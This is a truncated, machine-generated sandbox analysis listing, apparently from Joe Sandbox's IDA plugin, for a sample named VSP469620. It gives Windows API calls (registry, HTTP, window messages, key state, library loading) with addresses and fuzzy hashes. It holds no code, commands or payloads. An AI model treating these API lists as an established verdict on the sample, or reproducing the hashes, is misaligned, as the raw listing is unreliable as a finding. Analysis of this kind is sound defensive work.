                                                              • String ID: p1Mw`KNw
                                                              • API String ID: 3321077145-3626030660
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00B10587
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharLower
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 2358735015-567219261
                                                              APIs
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AEB88E
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AEB8A1
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AEB8D1
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B04401
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B04427
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B04457
                                                              • InternetCloseHandle.WININET(00000000), ref: 00B0449E
                                                                • Part of subcall function 00B05052: GetLastError.KERNEL32(?,?,00B043CC,00000000,00000000,00000001), ref: 00B05067
                                                              Strings
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 1951874230-3916222277
                                                              APIs
                                                                • Part of subcall function 00ACD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ACD1BA
                                                                • Part of subcall function 00ACD17C: GetStockObject.GDI32(00000011), ref: 00ACD1CE
                                                                • Part of subcall function 00ACD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ACD1D8
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B1915C
                                                              • LoadLibraryW.KERNEL32(?), ref: 00B19163
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B19178
                                                              • DestroyWindow.USER32(?), ref: 00B19180
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00AF9588
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AF95B9
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00AF95CB
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00AF9605
                                                              Strings
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: ecbadf8dad55763f275efbf5523dd3e1feac1f7fb91cf6f5ac7daf74f8c59db7
                                                              • Instruction ID: 2e04edcb4f6038ea0548187d55c81ea17e7f62885a6f85a8baef816e3d973cf2
                                                              • Opcode Fuzzy Hash: ecbadf8dad55763f275efbf5523dd3e1feac1f7fb91cf6f5ac7daf74f8c59db7
                                                              • Instruction Fuzzy Hash: D2215170500209ABDB259FA5DC05BAFB7F4AF59720F204A19FAA5D72D0D770D948CB10
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00AF9653
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AF9683
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00AF9694
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00AF96CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 13261a79d19f72edca08ffe7da1c729afa70da14f6050ee17a0f76ddfc4fd0d8
                                                              • Instruction ID: 83a3868dcde9758fc1b50b6a42602dc0bd3fcde6705ab8ec1bbcd2a7a8b89b7e
                                                              • Opcode Fuzzy Hash: 13261a79d19f72edca08ffe7da1c729afa70da14f6050ee17a0f76ddfc4fd0d8
                                                              • Instruction Fuzzy Hash: 0F217F716002099BDB609FA9DC44FAFB7E8AF55724F200A19FAA1E72D0EB70D841CB50
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00AFDB0A
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AFDB5E
                                                              • __swprintf.LIBCMT ref: 00AFDB77
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B4DC00), ref: 00AFDBB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: 3e4c47a530c5b0031531ccfce307c237f8d8d326c6385ef95e68c4cb0c231552
                                                              • Instruction ID: 53561ec225e80cfd1494203dc704f9e7790ec84f0fbd519f158524d540d15516
                                                              • Opcode Fuzzy Hash: 3e4c47a530c5b0031531ccfce307c237f8d8d326c6385ef95e68c4cb0c231552
                                                              • Instruction Fuzzy Hash: AD219535600208AFCB10EFA4DE85EEEB7F8EF48714B104069F605E7252DB71EA41DB61
                                                              APIs
                                                                • Part of subcall function 00AEC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AEC84A
                                                                • Part of subcall function 00AEC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AEC85D
                                                                • Part of subcall function 00AEC82D: GetCurrentThreadId.KERNEL32 ref: 00AEC864
                                                                • Part of subcall function 00AEC82D: AttachThreadInput.USER32(00000000), ref: 00AEC86B
                                                              • GetFocus.USER32 ref: 00AECA05
                                                                • Part of subcall function 00AEC876: GetParent.USER32(?), ref: 00AEC884
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00AECA4E
                                                              • EnumChildWindows.USER32(?,00AECAC4), ref: 00AECA76
                                                              • __swprintf.LIBCMT ref: 00AECA90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                              • String ID: %s%d
                                                              • API String ID: 3187004680-1110647743
                                                              • Opcode ID: 505a9bdf2a2bc964bd41afcfc785fe7c290e42e13caaa82dc21b9e178b9424e5
                                                              • Instruction ID: 568da5ed0f4c3c011e36517947adb0e5197093a86225e2032cd0faeb4a3cf9c6
                                                              • Opcode Fuzzy Hash: 505a9bdf2a2bc964bd41afcfc785fe7c290e42e13caaa82dc21b9e178b9424e5
                                                              • Instruction Fuzzy Hash: 87119D716002097BCF01BFA59E86FE937BDAB44764F00806ABE18AB182DB749546DB70
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B119F3
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B11A26
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B11B49
                                                              • CloseHandle.KERNEL32(?), ref: 00B11BBF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: 975d0e20940789562859ede4ce99163ef25d558c4688ace6844d75006acd958a
                                                              • Instruction ID: 1a67928246957b29f6a876e9ac6373271f45ec04e5eb7c2ca8c9f18001fbf466
                                                              • Opcode Fuzzy Hash: 975d0e20940789562859ede4ce99163ef25d558c4688ace6844d75006acd958a
                                                              • Instruction Fuzzy Hash: A9814370600214ABDF109F64C986FAEBBF5EF04720F158499FA15AF382DBB5ED418B90
                                                              APIs
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B1E1D5
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00B1E20D
                                                              • IsDlgButtonChecked.USER32(?,00000001), ref: 00B1E248
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00B1E269
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B1E281
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ButtonCheckedLongWindow
                                                              • String ID:
                                                              • API String ID: 3188977179-0
                                                              • Opcode ID: 3f3ec5f37ae3e9535ee953ff884100fda31e7ddc5da87e878adfda8126bcbd6b
                                                              • Instruction ID: acf065165e82c1da98cc3c1c770eaf142d45366bb04ba6985447da0d0d6adce4
                                                              • Opcode Fuzzy Hash: 3f3ec5f37ae3e9535ee953ff884100fda31e7ddc5da87e878adfda8126bcbd6b
                                                              • Instruction Fuzzy Hash: DF617F35600204AFDB25CF58C895FEA77FAEB49700F9444D9FD69A72A1C771E990CB10
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00AF1CB4
                                                              • VariantClear.OLEAUT32(00000013), ref: 00AF1D26
                                                              • VariantClear.OLEAUT32(00000000), ref: 00AF1D81
                                                              • VariantClear.OLEAUT32(?), ref: 00AF1DF8
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AF1E26
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType
                                                              • String ID:
                                                              • API String ID: 4136290138-0
                                                              • Opcode ID: 6ee999b2f2fb4642ed7e7011291acd0ba709c185beafd73ab1a618fe595cb61a
                                                              • Instruction ID: ca53e9a62fadd41844ef9eb1f4200c8045e8d39acf0962072e92c83a5d686c58
                                                              • Opcode Fuzzy Hash: 6ee999b2f2fb4642ed7e7011291acd0ba709c185beafd73ab1a618fe595cb61a
                                                              • Instruction Fuzzy Hash: AA5137B5A00209EFDB14CF58D880AAAB7B8FF4C354B158559FA59DB301E730EA51CFA0
                                                              APIs
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00B106EE
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00B1077D
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B1079B
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00B107E1
                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 00B107FB
                                                                • Part of subcall function 00ACE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00AFA574,?,?,00000000,00000008), ref: 00ACE675
                                                                • Part of subcall function 00ACE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00AFA574,?,?,00000000,00000008), ref: 00ACE699
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: ed2a1fbe49ad4b4d8c35a9597388c83ec6864f22fe17f6c1f31b49f1391a686d
                                                              • Instruction ID: d2bde95d352ba7caad180571c257ff748d0685cb68667e874a15065f2a29d82b
                                                              • Opcode Fuzzy Hash: ed2a1fbe49ad4b4d8c35a9597388c83ec6864f22fe17f6c1f31b49f1391a686d
                                                              • Instruction Fuzzy Hash: 6C510675A00205DFCB00EFA8C581EEDB7F9FF59310B558099EA15AB392DB70AD85CB90
                                                              APIs
                                                                • Part of subcall function 00B13C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B12EEF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B12F2E
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B12F75
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00B12FA1
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00B12FAE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 3740051246-0
                                                              • Opcode ID: 5f5fe7f350dafa76d3496554831efea2272677ec0182c6c8ae19a35e31f3456c
                                                              • Instruction ID: 469eb995e42c14eeb2eb10ebaadfccae26c663410afa423bb3936c6949068c68
                                                              • Opcode Fuzzy Hash: 5f5fe7f350dafa76d3496554831efea2272677ec0182c6c8ae19a35e31f3456c
                                                              • Instruction Fuzzy Hash: F7517632208204AFD704EF64C991EAEB7F8FF88714F40885DF595872A2EB30E955CB52
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b093c0d30e2ab2eaf04aabe77a8e9da97d9f783463022106501baee4afab5daf
                                                              • Instruction ID: 15bdb350d4b23032e5ffe12a93fb9cbd9f5db33545d28c8c0ee37462036dacdb
                                                              • Opcode Fuzzy Hash: b093c0d30e2ab2eaf04aabe77a8e9da97d9f783463022106501baee4afab5daf
                                                              • Instruction Fuzzy Hash: 7041B43A940244ABC710DF78DC84FE9BFE8EB09310F9402B5F959A72E1CB30AD91DA50
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B012B4
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B012DD
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B0131C
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B01341
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B01349
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
                                                              • Opcode ID: 89c109151d52e63fec18db3179d0fc0826360379637576e11a796683b891d292
                                                              • Instruction ID: 2d816b29cae719942b594a3e3c9753a3a187f3a7040ca9e25e0267772663077c
                                                              • Opcode Fuzzy Hash: 89c109151d52e63fec18db3179d0fc0826360379637576e11a796683b891d292
                                                              • Instruction Fuzzy Hash: 71410D35600105DFCF05EF64CA91AAEBBF9FF08310B148099E90AAB3A2DB31ED41DB51
APIs
• GetCursorPos.USER32(000000FF), ref: 00ACB64F
• ScreenToClient.USER32(00000000,000000FF), ref: 00ACB66C
• GetAsyncKeyState.USER32(00000001), ref: 00ACB691
• GetAsyncKeyState.USER32(00000002), ref: 00ACB69F
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 2f6677bbc79afec870c077e3ab77423ae6295e6e628133ea00b3e860836806cc
• Instruction ID: a9c62a103fabefddd02c12ee174fb581b5013ca28fea13892638690e45873ecb
• Opcode Fuzzy Hash: 2f6677bbc79afec870c077e3ab77423ae6295e6e628133ea00b3e860836806cc
• Instruction Fuzzy Hash: E5416B35604119FBCF159F64C945FE9BBB4FB05324F20435AF82996290CB31A994DFA1
APIs
• GetWindowRect.USER32(?,?), ref: 00AEB369
• PostMessageW.USER32(?,00000201,00000001), ref: 00AEB413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AEB41B
• PostMessageW.USER32(?,00000202,00000000), ref: 00AEB429
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AEB431
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: fe3ae030defdab687c0e4da31ef6537a1a22fb2560f6542b4ae6e02164f72098
• Instruction ID: 44bee536b3933e5ec0ca4289250bf03ddfa29adffa372f15db6c0ffa07e25135
• Opcode Fuzzy Hash: fe3ae030defdab687c0e4da31ef6537a1a22fb2560f6542b4ae6e02164f72098
• Instruction Fuzzy Hash: BE31CE7190025AEBDF04CF69D94EADF3BB5EB04315F104229F921AB1D1C7B0D914CBA0
APIs
• IsWindowVisible.USER32(?), ref: 00AEDBD7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AEDBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AEDC2C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AEDC52
• _wcsstr.LIBCMT ref: 00AEDC5C
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: 305ca139cf785321fc6cf4c4f3b8ec5c3ac381bcaf6f382c0ea5c6501714b898
• Instruction ID: 68abf734d11efa5e790006702ac0b77b1cd5bb68bb472151d8d3e10c8e31e009
• Opcode Fuzzy Hash: 305ca139cf785321fc6cf4c4f3b8ec5c3ac381bcaf6f382c0ea5c6501714b898
• Instruction Fuzzy Hash: 9321F971204144BFEB155F3AED49E7F7BA9DF85790F20403AF909DA191EEA1DC41D260
APIs
  • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
• GetWindowLongW.USER32(?,000000F0), ref: 00B1DEB0
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B1DED4
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B1DEEC
• GetSystemMetrics.USER32(00000004), ref: 00B1DF14
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00B03A1E,00000000), ref: 00B1DF32
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: 6cac80c3aa9de57676e5dc2005099c82129480304a9aa9d18e4bd089bf8156cf
• Instruction ID: ea15a261450c9ccb739f2fad0acee0f082175aae4d9c045e25427c877c0e80c9
• Opcode Fuzzy Hash: 6cac80c3aa9de57676e5dc2005099c82129480304a9aa9d18e4bd089bf8156cf
• Instruction Fuzzy Hash: 8721A472611216AFCF204F7C9C84BAA37D4FB15725F650764F926CB5E0DB309991CB90
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AEBC90
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AEBCC2
• __itow.LIBCMT ref: 00AEBCDA
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AEBD00
• __itow.LIBCMT ref: 00AEBD11
Memory Dump Source
• Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
